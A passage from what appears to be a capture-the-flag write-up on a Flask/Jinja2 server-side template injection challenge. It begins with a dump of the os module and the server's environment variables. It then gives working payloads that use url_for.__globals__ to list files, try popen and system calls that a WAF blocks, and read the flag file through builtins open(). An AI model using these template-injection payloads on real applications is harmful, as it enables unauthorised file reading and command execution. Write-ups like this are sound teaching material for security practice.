'SC_USHRT_MAX': 118, 'SC_THREAD_KEYS_MAX': 74, 'SC_XOPEN_XPG4': 100, 'SC_SEM_VALUE_MAX': 33, 'SC_XOPEN_XPG2': 98, 'SC_XOPEN_XPG3': 99, 'SC_GETGR_R_SIZE_MAX': 69, 'SC_SEM_NSEMS_MAX': 32, 'SC_AVPHYS_PAGES': 86, 'SC_NL_NMAX': 122, 'SC_PAGESIZE': 30, 'SC_EXPR_NEST_MAX': 42, 'SC_XOPEN_LEGACY': 129, 'SC_SHRT_MAX': 113, 'SC_2_SW_DEV': 51, 'SC_SSIZE_MAX': 110, 'SC_RTSIG_MAX': 31, 'SC_THREAD_PRIO_INHERIT': 80, 'SC_EQUIV_CLASS_MAX': 41, 'SC_NL_ARGMAX': 119, 'SC_PII_OSI_CLTS': 64, 'SC_2_CHAR_TERM': 95, 'SC_THREAD_PROCESS_SHARED': 82, 'SC_VERSION': 29, 'SC_LONG_BIT': 106, 'SC_SIGQUEUE_MAX': 34, 'SC_ATEXIT_MAX': 87, 'SC_BC_BASE_MAX': 36, 'SC_SELECT': 59, 'SC_XOPEN_ENH_I18N': 93, 'SC_PAGE_SIZE': 30, 'SC_PII_XTI': 54, 'SC_MEMORY_PROTECTION': 19, 'SC_TIMER_MAX': 35, 'SC_AIO_LISTIO_MAX': 23, 'SC_UCHAR_MAX': 115, 'SC_SCHAR_MAX': 111, 'SC_2_UPE': 97, 'SC_NL_SETMAX': 123, 'SC_RE_DUP_MAX': 44, 'SC_BC_SCALE_MAX': 38, 'SC_TZNAME_MAX': 6, 'SC_LOGIN_NAME_MAX': 71, 'SC_NPROCESSORS_ONLN': 84, 'SC_SEMAPHORES': 21, 'SC_SAVED_IDS': 8, 'SC_XOPEN_SHM': 94, 'SC_2_FORT_RUN': 50, 'SC_XOPEN_VERSION': 89, 'SC_IOV_MAX': 60, 'SC_2_VERSION': 46, 'SC_THREAD_DESTRUCTOR_ITERATIONS': 73, 'SC_ASYNCHRONOUS_IO': 12, 'SC_MESSAGE_PASSING': 20, 'SC_CHILD_MAX': 1, 'SC_ULONG_MAX': 117, 'SC_2_C_VERSION': 96, 'SC_ARG_MAX': 0, 'SC_GETPW_R_SIZE_MAX': 70, 'SC_XOPEN_CRYPT': 92, 'SC_SCHAR_MIN': 112, 'SC_AIO_PRIO_DELTA_MAX': 25, 'SC_NL_LANGMAX': 120, 'SC_THREAD_STACK_MIN': 75, 'SC_CHAR_MIN': 103, 'SC_NL_TEXTMAX': 124, 'SC_STREAM_MAX': 5, 'SC_UIO_MAXIOV': 60, 'SC_MEMLOCK': 17, 'SC_NZERO': 109, 'SC_SHARED_MEMORY_OBJECTS': 22, 'SC_THREAD_THREADS_MAX': 76, 'SC_THREAD_ATTR_STACKADDR': 77, 'SC_INT_MIN': 105, 'SC_SHRT_MIN': 114, 'SC_COLL_WEIGHTS_MAX': 40, 'SC_THREAD_PRIORITY_SCHEDULING': 79, 'SC_THREAD_ATTR_STACKSIZE': 78, 'SC_PHYS_PAGES': 85, 'SC_JOB_CONTROL': 7, 'SC_FSYNC': 15, 'SC_CHARCLASS_NAME_MAX': 45, 'SC_XOPEN_UNIX': 91, 'SC_BC_DIM_MAX': 37, 'SC_PII_INTERNET_STREAM': 61, 'SC_MB_LEN_MAX': 108, 'SC_UINT_MAX': 116, 'SC_CHAR_BIT': 101, 'SC_XOPEN_REALTIME': 130, 'SC_MQ_OPEN_MAX': 27, 'SC_PII_OSI_M': 65, 'SC_PRIORITY_SCHEDULING': 10, 'SC_NGROUPS_MAX': 3, 'SC_MQ_PRIO_MAX': 28, 'SC_XBS5_LPBIG_OFFBIG': 128, 'SC_PII_SOCKET': 55, 'SC_MAPPED_FILES': 16, 'SC_PII_INTERNET_DGRAM': 62, 'SC_XBS5_LP64_OFF64': 127, 'SC_XOPEN_XCU_VERSION': 90, 'SC_OPEN_MAX': 4, 'SC_PRIORITIZED_IO': 13, 'SC_TTY_NAME_MAX': 72, 'SC_WORD_BIT': 107, 'SC_SYNCHRONIZED_IO': 14, 'SC_PASS_MAX': 88, 'SC_PII_INTERNET': 56, 'SC_LINE_MAX': 43, 'SC_XBS5_ILP32_OFF32': 125, 'SC_2_C_DEV': 48, 'SC_2_C_BIND': 47, 'SC_BC_STRING_MAX': 39, 'SC_THREAD_PRIO_PROTECT': 81, 'SC_CHAR_MAX': 102, 'SC_XBS5_ILP32_OFFBIG': 126, 'SC_2_LOCALEDEF': 52, 'SC_PII': 53, 'SC_POLL': 58, 'SC_2_FORT_DEV': 49, 'SC_INT_MAX': 104, 'SC_NPROCESSORS_CONF': 83, 'SC_DELAYTIMER_MAX': 26, 'SC_THREAD_SAFE_FUNCTIONS': 68, 'SC_MEMLOCK_RANGE': 18, 'SC_NL_MSGMAX': 121, 'SC_TIMERS': 11, 'SC_XOPEN_REALTIME_THREADS': 131, 'SC_CLK_TCK': 2}, 'link': <built-in function link>, 'execve': <built-in function execve>, 'wait4': <built-in function wait4>, 'O_SYNC': 1052672, 'chdir': <built-in function chdir>, 'wait3': <built-in function wait3>, '_make_statvfs_result': <function _make_statvfs_result at 0x7fde0fdfde60>, 'strerror': <built-in function strerror>, 'popen3': <function popen3 at 0x7fde0fdfd758>, 'abort': <built-in function abort>, 'setresuid': <built-in function setresuid>, 'error': <type 'exceptions.OSError'>, 'ftruncate': <built-in function ftruncate>, 'WUNTRACED': 2, 'setuid': <built-in function setuid>, 'EX_DATAERR': 65, 'curdir': '.', 'sysconf': <built-in function sysconf>, 'ST_NOATIME': 1024, 'W_OK': 2, 'EX_OK': 0, 'R_OK': 4, 'statvfs_result': <type 'posix.statvfs_result'>, 'O_NONBLOCK': 2048, 'confstr': <built-in function confstr>, 'path': <module 'posixpath' from '/usr/lib/python2.7/posixpath.pyc'>, 'WEXITSTATUS': <built-in function WEXITSTATUS>, 'EX_NOUSER': 67, 'pipe': <built-in function pipe>, 'chroot': <built-in function chroot>, 'getgroups': <built-in function getgroups>, 'spawnlpe': <function spawnlpe at 0x7fde0fdfd668>, 'geteuid': <built-in function geteuid>, 'spawnve': <function spawnve at 0x7fde0fdfd398>, 'setpgrp': <built-in function setpgrp>, '__package__': None, 'write': <built-in function write>, 'EX_UNAVAILABLE': 69, 'altsep': None, 'waitpid': <built-in function waitpid>, 'forkpty': <built-in function forkpty>, 'nice': <built-in function nice>, 'listdir': <built-in function listdir>, 'pathconf': <built-in function pathconf>, '_pickle_stat_result': <function _pickle_stat_result at 0x7fde0fdfdde8>, 'ST_RDONLY': 1, 'unsetenv': <built-in function unsetenv>, 'SEEK_SET': 0, 'spawnle': <function spawnle at 0x7fde0fdfd578>, 'O_RDONLY': 0, 'O_DIRECT': 16384, 'sys': <module 'sys' (built-in)>, 'pathconf_names': {'PC_MAX_INPUT': 2, 'PC_VDISABLE': 8, 'PC_SYNC_IO': 9, 'PC_SOCK_MAXBUF': 12, 'PC_NAME_MAX': 3, 'PC_MAX_CANON': 1, 'PC_PRIO_IO': 11, 'PC_CHOWN_RESTRICTED': 6, 'PC_ASYNC_IO': 10, 'PC_NO_TRUNC': 7, 'PC_FILESIZEBITS': 13, 'PC_LINK_MAX': 0, 'PC_PIPE_BUF': 5, 'PC_PATH_MAX': 4}, 'confstr_names': {'CS_XBS5_LP64_OFF64_CFLAGS': 1108, 'CS_LFS64_CFLAGS': 1004, 'CS_XBS5_LPBIG_OFFBIG_LIBS': 1114, 'CS_XBS5_ILP32_OFFBIG_LINTFLAGS': 1107, 'CS_XBS5_ILP32_OFF32_LIBS': 1102, 'CS_XBS5_ILP32_OFF32_LINTFLAGS': 1103, 'CS_LFS64_LIBS': 1006, 'CS_XBS5_ILP32_OFF32_CFLAGS': 1100, 'CS_XBS5_ILP32_OFFBIG_CFLAGS': 1104, 'CS_LFS_LDFLAGS': 1001, 'CS_LFS_LINTFLAGS': 1003, 'CS_LFS_LIBS': 1002, 'CS_PATH': 0, 'CS_LFS64_LINTFLAGS': 1007, 'CS_LFS_CFLAGS': 1000, 'CS_LFS64_LDFLAGS': 1005, 'CS_XBS5_ILP32_OFFBIG_LIBS': 1106, 'CS_XBS5_ILP32_OFF32_LDFLAGS': 1101, 'CS_XBS5_LPBIG_OFFBIG_LINTFLAGS': 1115, 'CS_XBS5_ILP32_OFFBIG_LDFLAGS': 1105, 'CS_XBS5_LP64_OFF64_LINTFLAGS': 1111, 'CS_XBS5_LP64_OFF64_LIBS': 1110, 'CS_XBS5_LPBIG_OFFBIG_CFLAGS': 1112, 'CS_XBS5_LPBIG_OFFBIG_LDFLAGS': 1113, 'CS_XBS5_LP64_OFF64_LDFLAGS': 1109}, 'setgroups': <built-in function setgroups>, 'unlink': <built-in function unlink>, 'tcgetpgrp': <built-in function tcgetpgrp>, 'spawnlp': <function spawnlp at 0x7fde0fdfd5f0>, 'spawnl': <function spawnl at 0x7fde0fdfd500>, 'EX_PROTOCOL': 76, 'getuid': <built-in function getuid>, 'spawnvp': <function spawnvp at 0x7fde0fdfd410>, 'X_OK': 1, 'O_EXCL': 128, 'fpathconf': <built-in function fpathconf>, 'chown': <built-in function chown>, 'environ': {'LANG': 'en_US.UTF-8', 'SUPERVISOR_SERVER_URL': 'unix:///var/run/supervisor.sock', 'LANGUAGE': 'en_US:en', 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'SUPERVISOR_ENABLED': '1', 'SUPERVISOR_PROCESS_NAME': 'app', 'SUPERVISOR_GROUP_NAME': 'app', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'}, 'O_NDELAY': 2048, 'EX_CONFIG': 78, 'EX_USAGE': 64, 'ST_NODEV': 4}
```

↓

`listdir()` is discovered !!

---

```
GET /{{url_for.__globals__.os.__dict__.listdir('./')}}
```

↓

```
['app.py', 'flag_secret_file_910230912900891283']
```

↓

flag is discovered!!

---

## 【Find a way to read flag】

### **1.Try via the OS command execution function**

```
GET /{{url_for.__globals__.os.__dict__.popen('ls').read()}} ⇒500エラー WAF
GET /{{url_for.__globals__.os.__dict__.system('ls').read()}} 　⇒500エラー WAF
```

↓

It was impossible via the OS command...

---

### **2.Try via file manipulation function**

```
GET /{{url_for.__globals__.__builtins__.open('flag_secret_file_910230912900891283').read()}}
```

↓

`flag{blacklists_are_insecure_even_if_you_do_not_know_the_bypass_friend_1023092813}`

Believer Case

Comments

Sign in with